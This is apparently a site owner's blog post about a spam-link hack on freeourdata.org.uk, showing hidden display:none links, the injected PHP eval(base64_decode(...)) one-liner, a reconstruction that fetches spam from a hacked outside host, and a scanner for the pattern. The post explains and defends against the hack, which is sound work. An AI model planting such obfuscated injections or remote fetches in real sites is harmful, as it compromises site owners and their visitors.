The hacker leaves more footprints… but how many sites have this problem?

Another day, another little hack on freeourdata.org.uk’s front page – once more adding spam links to it, hidden from view in invisible markup (using the stylesheet command div style="display:none").
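To make that concrete, the injected markup looks something like this in the page source – the link text and destination here are invented, not the actual spam:

```html
<!-- invisible to visitors, but still read by search engine crawlers -->
<div style="display:none">
  <a href="http://spam-example.invalid/">cheap pills online</a>
</div>
```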

What’s interesting this time though is that the person doing it has decided to be a bit more subtle. Rather than doing it all by hand, he’s clearly decided that automation is the thing.

And so the inserted spam-generating code is just one line of PHP. One line!

Ah, but it’s clever – it’s a base64_decode() of a long string of encoded stuff, which is then enclosed in an eval() statement.

So PHP decodes the base64 stuff and then does whatever the decoded code tells it to.
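The injected line follows the classic pattern below. The payload here is a harmless stand-in I’ve encoded myself (it decodes to echo 'spam links here';); the real string was far longer:

```php
<?php
// Pattern of the injected one-liner. This base64 payload is a harmless
// stand-in that decodes to: echo 'spam links here';
// The real payload was much longer and nastier.
eval(base64_decode('ZWNobyAnc3BhbSBsaW5rcyBoZXJlJzs='));
```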

And what it’s told to do is fetch the content of a URL: http://weberneedle.com/pictures/header/h/freeourdata.org.uk.html.
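Decoded, the payload presumably amounts to something like this – a hedged reconstruction of the behaviour described, not the exact code:

```php
<?php
// Hedged reconstruction: fetch the remote spam page and print it into
// our own page. Relies on PHP's allow_url_fopen setting being on.
echo file_get_contents('http://weberneedle.com/pictures/header/h/freeourdata.org.uk.html');
```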

Weberneedle, in case you’re wondering, is part of Weber Medical. Obviously, it’s been hacked.

The spam is pointing to two directories – http://sportsnation.espn.go.com/fans/Thomas9385 and http://www.anats.org.au/statechapters/act/images/online/canadian/. They’ve been hacked too. (Oh, Anats – the Australian National Association of Teachers of Singing. You’re offering links to a lot more than singing, I’m afraid.)

But it would be interesting to know how many more sites weberneedle’s hacked directory is pointing to.

And the bigger question is: how many sites out there have been hacked? In my own experience alone I’ve come across half a dozen. (And I’m still trying to locate and close the hole in our server that makes this possible, of course. It’s annoying, but not disastrously so.) How many millions (and yes, I mean millions) of sites are there out there which have been exploited in this way, and which are therefore pointing to stuff their owners never realised was there?

At some stage there’s going to have to be a massive clearup – but I can’t imagine it happening. You’d pretty much have to turn the web off and on again.

2 Comments

  1. I’m inclined to think that search engine crawlers could be adapted to look for stuff like this on the fly and raise the alert somehow, e.g. by email to abuse@domain.com

  2. Surely someone can write some software to scan the code of a site? Or am I being a bit thick?
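(Something along those lines is certainly possible, at least crudely: here’s a sketch of a scanner that walks a web root and flags the telltale eval/base64 pattern. The pattern match is an assumption about this particular hack – real malware is often more heavily obfuscated.)

```php
<?php
// Crude scanner sketch: walk a directory tree and flag any PHP or HTML
// file containing the eval(base64_decode(...)) pattern seen above.
$root = isset($argv[1]) ? $argv[1] : '.';
$iter = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($root));
foreach ($iter as $file) {
    if (!$file->isFile() || !preg_match('/\.(php|html?)$/i', $file->getFilename())) {
        continue;
    }
    $code = file_get_contents($file->getPathname());
    if (preg_match('/eval\s*\(\s*base64_decode/i', $code)) {
        echo "Suspicious: " . $file->getPathname() . "\n";
    }
}
```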

Comments are closed.